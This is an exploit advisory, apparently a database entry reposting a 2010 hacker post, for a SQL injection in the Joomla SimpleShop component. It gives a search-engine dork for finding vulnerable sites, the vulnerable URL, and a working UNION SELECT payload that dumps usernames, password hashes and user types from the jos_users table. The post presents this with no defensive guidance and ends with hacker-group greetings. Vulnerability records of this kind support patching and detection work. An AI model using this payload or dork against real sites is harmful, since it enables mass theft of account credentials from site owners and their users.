Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:69502
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ==============================================================
Joomla Component (com_simpleshop) SQL Injection Vulnerability
==============================================================

###########################
Title : Joomla Component (com_simpleshop) SQL Injection Vulnerability
Script : Joomla Galore Simple Shop
Date : 07/26/2010
Author : UnD3rGr0unD W4rri0rZ
Vendor : http://galore.co.za/ 
Dork : inurl:"option=com_simpleshop" & inurl:"viewprod"
###########################   
         
[ Vulnerable File ]
     
[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]

[SQL]:

id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

Xpl
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

##############################################################   
#==================================================
#{~} I am HeaDShoT(tunisian muslim hacker) From UnD3rGr0unD W4rri0rZ  {~}
#
#cont@ct:
#pwz@hotmail.Fr
#
#{~} there is always one who intelligent more than you do you should be optimistic  {~}
#==================================================
#all greetZ to allah
#&
# my friends
# M4MIM4N // L363ND //Meher Assel // Ghost_tn //ta3lab el maker // Th3 m3t4l-m4n
#
##############################################################